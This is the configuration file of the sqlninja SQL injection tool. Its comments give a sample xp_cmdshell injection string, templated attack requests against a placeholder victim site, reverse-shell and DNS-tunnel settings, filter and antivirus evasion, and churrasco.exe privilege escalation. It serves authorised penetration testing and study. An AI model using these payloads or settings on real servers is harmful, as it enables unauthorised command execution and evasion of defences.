1###################################
2#   SQLNINJA CONFIGURATION FILE   #
3###################################
4
5# options are case sensitive
6# see sqlninja-howto.html for more information and examples
7
8############ HTTP REQUEST ############
9# The entire HTTP request, including the exploit string and a marker for the
10# SQL command to execute (__SQL2INJECT__)
11# Be sure to include the vulnerable parameter and the character sequence that
12# allows us to start injecting commands. In general this means, at least:
13# - an apostrophe (if the parameter is a string)
14# - a semicolon (to end the original query)
15# It must also include everything necessary to properly close the original
16# query, like an appropriate number of closing brackets. Don't forget to
17# URL-encode, where needed (e.g. a space must become '%20' or '+')
18#
19# For instance, if you need to inject something like the following:
20#    aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'--
21# then  parameter should look like this:
22#    aaa=1&bbb=x';__SQL2INJECT__
23#
24# Make sure that:
25# 1. The --httprequest_start-- and-- httprequest_end-- markers are in place
26# 2. All required headers are present
27# 3. There are no spaces at the beginning of a line
28# 4. There are not comment lines
29# Consider copying the exact request that triggers the injection from a proxy
30# intercept (e.g.: BurpSuite), if unsure
31#
32# GET EXAMPLE:
33# --httprequest_start--
34# GET http://www.victim.com/page.asp?vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah HTTP/1.0
35# Host: www.victim.com
36# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
37# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
38# Accept-Language: en-us,en;q=0.7,it;q=0.3
39# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
40# Content-Type: application/x-www-form-urlencoded
41# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
42# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
43# Connection: close
44# --httprequest_end--
45#
46# POST EXAMPLE: (The Content-Length Header is automatically added by sqlninja!)
47# --httprequest_start--
48# POST https://www.victim.com/page.asp HTTP/1.0
49# Host: www.victim.com
50# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
51# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
52# Accept-Language: en-us,en;q=0.7,it;q=0.3
53# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
54# Content-Type: application/x-www-form-urlencoded
55# Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
56# Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
57# Connection: close
58#
59# vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
60# --httprequest_end--
61#
62# HEADER-BASED EXAMPLE:
63# --httprequest_start--
64# GET http://www.victim.com/page.asp HTTP/1.0
65# Host: www.victim.com
66# User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
67# Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
68# Accept-Language: en-us,en;q=0.7,it;q=0.3
69# Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
70# Content-Type: application/x-www-form-urlencoded
71# Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
72# Connection: close
73# --httprequest_end--
74#
75# Note that in the last example the semicolon was encoded, otherwise the server would not
76# parse __SQL2INJECT__ as part of VulnCookie
77
78# Local host: your IP address (for backscan and revshell modes)
79lhost = 192.168.60.1
80
81# Interface to sniff when in backscan mode
82device = eth0
83
84# Evasion techniques to be used. Possible choices are:
85# 1 - Query hex-encoding
86# 2 - Comments as separators
87# 3 - Random case
88# 4 - Random URI encoding
89# All techniques can be combined, so the following is legal:
90# evasion = 1234
91# However, keep in mind that using too many techniques at once leads to very
92# long queries, that might create problems when using GET. Default: no evasion
93# evasion = 12
94
95# Path to metasploit executable. Only needed if msfpayload and
96# msfcli are not already in the path
97msfpath = /home/user/trunk/
98
99# Encoder to use with msfencode. If the option is not present, no encoding
100# is used. However, it's definitely recommended to use it, if you suspect that
101# an AV is present. A list of available encoders can be retrieved by simply
102# running "msfencoder -l"
103# msfencoder = x86/shikata_ga_nai
104
105# Number of times to encode the metasploit payload. Default: 5
106# msfencodecount = 4
107
108# If you can execute commands but SQL Server does not run as SYSTEM,
109# you can use churrasco.exe to steal the appropriate token and escalate
110# privileges. Enable this option to use churrasco.exe before executing
111# a command. This is especially useful with the metasploit module and VNC
112# Obviously, you first need to upload churrasco.exe using
113# the upload module!
114usechurrasco = no
115
116# Proxy host to use (default: none)
117# proxyhost = 127.0.0.1
118
119# Proxy port to use (default: 8080)
120# proxyport = 8080
121
122
123# Domain to use for dnstunnel mode
124domain = sqlninja.net
125
126# tcpdump filter (optional)
127# filter = src host x.x.x.x
128
129# Backscan timeout after web request conclusion (Default: 5 secs)
130# timeout = 5
131
132# Maximum hostname length for DNS tunnel (Max: 250 - Default: 250)
133# hostnamelength = 250
134
135# IP address to return to DNS queries (default: 10.255.255.254)
136# resolvedip = 10.255.255.254
137
138# Name of the procedure to use/create to launch commands. Default is
139# "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
140# for each command
141# xp_name = xp_cmdshell
142
143# Time value for the WAITFOR during inference attack of fingerprint and
144# bruteforce mode. A higher value makes things slower but will yeld more
145# precise results against slow targets.
146# Min: 3 seconds. Max: 59 seconds. Default: 5 seconds
147blindtime = 5
148
149# Number of script lines to upload with a single HTTP request. A higher number
150# obviously means a faster upload. However, do not push this too high if your
151# request contains very long parameters. Maximum is 30, and 10 is a default
152# safe value providing already a good speed
153# lines_per_request = 10
154
155# If the remote server returns a custom error page instead of a standard
156# HTTP error code (e.g. 500 Server Error), it is wise to set this value to
157# some string that is present in such a page. This will help sqlninja in
158# figuring out if things seem to be wrong
159# errorstring = "an error has occurred"
160
161# By default, sqlninja appends two hyphens to the injected query in order
162# to comment out any spurious SQL code. This is good and works in
163# approximately 99% of the cases. However, you might want to change this
164# behavior in some very specific scenarios. Change this setting only if you
165# really know what you are doing,
166# Possible values: yes/no
167# appendcomment = yes
168
169# When using the Metasploit module DEP is not a problem anymore, since in
170# all recent versions of the framework the stager will take care of it by
171# itself. However, if needed you can still roll back to the old sqlninja
172# behavior and disable DEP by whitelisting the stager with a call to
173# xp_regwrite. To do so, set 'checkdep' to 'yes'
174# checkdep = no
175
176# You can override the standard marker used to detect where to inject the
177# sql attack code. You will probably never need to change this
178# sqlmarker = __SQL2INJECT__
179